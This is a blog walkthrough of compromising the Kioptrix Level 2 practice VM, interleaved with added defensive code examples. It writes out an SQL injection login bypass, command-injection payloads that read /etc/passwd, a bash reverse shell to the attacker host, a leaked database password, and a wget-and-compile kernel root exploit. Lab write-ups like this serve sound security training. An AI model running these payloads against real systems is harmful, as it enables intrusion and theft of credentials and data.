Sunday, November 3, 2013

Kioptrix Level 2 - Walkthrough

So, Level 1 was way too easy; Level 2 was a little bit trickier, but still not hard. I found it more interesting. Let's see:

The detailed NMAP scan results were the following:

root@kali:~# nmap -sS -A 192.168.1.19

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-03 08:15 CET
Nmap scan report for 192.168.1.19
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            623/udp  status
|_  100024  1            626/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-07T23:10:47+00:00
|_Not valid after:  2010-10-07T23:10:47+00:00
|_ssl-date: 2013-11-03T04:05:56+00:00; -3h09m48s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:91:C9:95 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.1.19

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds

Again, I went for the webserver first (I don't hate webservers or anything :)). This time I got to an interesting webpage (on Level 1 it was only a default HTML page). It was a login page, and I tried a simple SQL injection; from the Nmap scan I knew the server was running MySQL, so that helped. I used:

admin' OR 1=1 #


and it let me in. I got a page where I could execute the ping command.
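The login bypass described above, reproduced as an added example (not code from the original post or from the Kioptrix VM): a string-concatenated login query falls to the `OR 1=1` payload, while the same check written as a parameterised query does not. The table, the `admin` account and its password are constructed for the demo; SQLite is used so it runs offline. The post's payload ends the statement with `#`, which MySQL treats as a line comment; SQLite only knows `--`, so the payload is written with `-- ` here.

```python
# Added example: SQL injection login bypass vs. parameterised query.
# Database contents are constructed; not the Kioptrix application's code.
import sqlite3


def make_db():
    """Constructed sample database with one legitimate account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-concatenated query: user input becomes part of the SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row is not None


def login_safe(conn, username, password):
    """Parameterised query: the driver passes the input as data, never as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None


# The post's payload uses '#' as the comment marker (MySQL); SQLite uses '--'.
BYPASS = "admin' OR 1=1 -- "

if __name__ == "__main__":
    db = make_db()
    # The comment swallows the password check, so the concatenated query
    # becomes: ... WHERE username = 'admin' OR 1=1
    print("vulnerable login with payload:", login_vulnerable(db, BYPASS, "wrong"))
    print("parameterised login with payload:", login_safe(db, BYPASS, "wrong"))
```

The parameterised version still accepts the real credentials; what changes is that the quote and comment characters in the payload are matched literally against the `username` column instead of rewriting the `WHERE` clause.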


As the output of the command looked like system output, I thought that I could append other commands to it in order to execute arbitrary commands. It turned out that I was right, and I could read files or even open a reverse shell back to my computer. Some nice tricks to get a reverse shell:


Commands used on the page:

192.168.1.1;cat /etc/passwd
192.168.1.1;bash -i >& /dev/tcp/192.168.1.17/4444 0>&1
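Why the ping page accepted the `;` payloads above, shown as an added example (not the original application's code): building one shell string from the form value lets the separator start a second command, whereas validating the value as an IP address and executing an argument vector with no shell leaves nothing for `;` to do. A small detector for shell metacharacters in request parameters is included for the log-review side. The helper names and the sample inputs are this example's own.

```python
# Added example: command injection in a "ping" form, vulnerable shape vs. hardened
# shape, plus a metacharacter check for request parameters. Not the VM's code.
import ipaddress
import re
import shlex
import subprocess

# Characters the shell interprets; the post's payloads rely on ';'.
SHELL_META = re.compile(r"[;&|`$<>\n(){}]")


def find_shell_metachars(value):
    """Return the distinct shell metacharacters present in a request parameter."""
    return sorted(set(SHELL_META.findall(value)))


def build_ping_command_vulnerable(host):
    """The shape of the original bug: the parameter is pasted into one shell
    string, so '192.168.1.1;cat /etc/passwd' runs two commands.
    Returned as a string for illustration only; never executed here."""
    return "ping -c 1 " + host


def build_ping_argv(host):
    """Hardened: accept only a syntactically valid IP address and build an
    argument vector, so no shell is involved at all."""
    try:
        ip = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError("not an IP address: %r" % host)
    return ["ping", "-c", "1", str(ip)]


def run_ping(host, timeout=5):
    """Execute the validated command without a shell (shell=False is the default)."""
    proc = subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=timeout)
    return proc.stdout


# Constructed sample values, as a web form might receive them.
SAMPLES = [
    "192.168.1.1",
    "192.168.1.1;cat /etc/passwd",
    "192.168.1.1 && id",
]

if __name__ == "__main__":
    for s in SAMPLES:
        meta = find_shell_metachars(s)
        try:
            verdict = "accepted -> " + shlex.join(build_ping_argv(s))
        except ValueError as e:
            verdict = "rejected (%s)" % e
        print("%-30r meta=%-8s %s" % (s, meta, verdict))
```

Validation alone is not the fix; the argument vector is. `ipaddress.ip_address` rejects anything that is not one address, and because `subprocess.run` receives a list, even a value that slipped past validation would be handed to `ping` as a single argument rather than parsed by `/bin/sh`.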



After getting a shell on the victim, I saw that I was running with "apache" privileges.

root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.17] from (UNKNOWN) [192.168.1.19] 32771
bash: no job control in this shellbash-3.00$
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ pwd
/var/www/html
bash-3.00$ uname -r
2.6.9-55.EL

Before I got root, I did some enumeration (most important!!!) and found some interesting stuff; it didn't lead to a root account, but it was still worthwhile.

From the webpage source I could retrieve a MySQL login password:

bash-3.00$ cat index.php
<?php
    mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
(...)

I could log in to MySQL, but my shell wasn't fully interactive, so I executed a one-line Python script to spawn a proper TTY:

python -c 'import pty;pty.spawn("/bin/sh")'

bash-3.00$ python -c 'import pty;pty.spawn("/bin/sh")'
sh-3.00$ mysql -u john -p
mysql -u john -p
Enter password: hiroshima

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 22969 to server version: 4.1.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

mysql> select * from user;
select * from user;
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
| Host                  | User | Password         | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections |
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
| localhost             | root | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                |          |            |             |              |             0 |           0 |               0 |
| localhost.localdomain | root | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                |          |            |             |              |             0 |           0 |               0 |
| localhost.localdomain |      |                  | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
| localhost             |      |                  | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
| localhost             | john | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
5 rows in set (0.00 sec)

mysql> exit
exit
Bye
sh-3.00$ mysql -u root -p
mysql -u root -p
Enter password: hiroshima

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 22971 to server version: 4.1.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

As you can see above, I could query the mysql user table. The password hashes for root and john are identical, so knowing john's password already gave me the root password for the database.
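Why the reuse is visible at a glance, as an added example (not from the original post): the 16-hex-character values in the `Password` column are the pre-4.1 `PASSWORD()` format, which is unsalted, so two accounts with the same password always carry the same hash. The script below implements that legacy algorithm to show the property, and runs a small audit over the `Host`, `User` and `Password` columns transcribed from the table above: accounts sharing a hash, accounts still in the legacy format, and the anonymous (empty user name) accounts. The function names are this example's own.

```python
# Added example: audit of the mysql.user rows shown in the post.
# Rows are transcribed from the table above; the function names are hypothetical.
from collections import defaultdict

# (Host, User, Password) columns of the table above.
USER_ROWS = [
    ("localhost",             "root", "5a6914ba69e02807"),
    ("localhost.localdomain", "root", "5a6914ba69e02807"),
    ("localhost.localdomain", "",     ""),
    ("localhost",             "",     ""),
    ("localhost",             "john", "5a6914ba69e02807"),
]


def old_mysql_password(password):
    """The pre-4.1 PASSWORD() algorithm (16 hex chars, no salt, no per-user
    input): identical passwords always produce identical hashes."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password:
        if ch in " \t":            # the original skips blanks
            continue
        c = ord(ch)
        nr = (nr ^ ((((nr & 63) + add) * c) + (nr << 8))) & 0xFFFFFFFF
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF
        add += c
    # Only the low 31 bits of each word are kept (sign bit discarded).
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def is_legacy_hash(h):
    """16 lowercase hex chars = pre-4.1 format (4.1+ hashes are 41 chars, '*'-prefixed)."""
    return len(h) == 16 and all(c in "0123456789abcdef" for c in h)


def shared_hashes(rows):
    """Map each non-empty hash to the distinct user names that carry it (reuse)."""
    by_hash = defaultdict(set)
    for _host, user, pw in rows:
        if pw:
            by_hash[pw].add(user)
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}


def anonymous_accounts(rows):
    """Accounts with an empty user name; these match any connecting user."""
    return [(host, user) for host, user, _pw in rows if user == ""]


def legacy_accounts(rows):
    """Users whose stored hash is still in the unsalted pre-4.1 format."""
    return sorted({user for _host, user, pw in rows if pw and is_legacy_hash(pw)})


if __name__ == "__main__":
    print("same hash shared by:", shared_hashes(USER_ROWS))
    print("legacy-format hashes:", legacy_accounts(USER_ROWS))
    print("anonymous accounts:", anonymous_accounts(USER_ROWS))
    # Determinism is the whole problem: no salt, so equal input -> equal output.
    print("same password twice:", old_mysql_password("x") == old_mysql_password("x"))
```

Each of the three findings is a separate hardening item: distinct passwords per account (and never the application account's password for root), migration off the 16-character hash format, and removal of the anonymous `''@localhost` entries.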

This is nice, but I'm still not root (at least not on the system). Looking at the Linux kernel version and doing a quick Google search gave the exploit as the first hit:

Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit

After downloading it, I copied it to the victim with wget, compiled it and finally ran it, and again I got root.

sh-3.00$ uname -r
uname -r
2.6.9-55.EL
sh-3.00$ wget http://192.168.1.17/0x82-CVE-2009-2698.c
wget http://192.168.1.17/0x82-CVE-2009-2698.c
--01:33:26--  http://192.168.1.17/0x82-CVE-2009-2698.c
           => `0x82-CVE-2009-2698.c'
Connecting to 192.168.1.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

100%[====================================>] 2,645         --.--K/s            

01:33:26 (813.29 KB/s) - `0x82-CVE-2009-2698.c' saved [2645/2645]

sh-3.00$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
sh-3.00# id
id
uid=0(root) gid=0(root) groups=48(apache)


I found this level more interesting because of its custom web application.
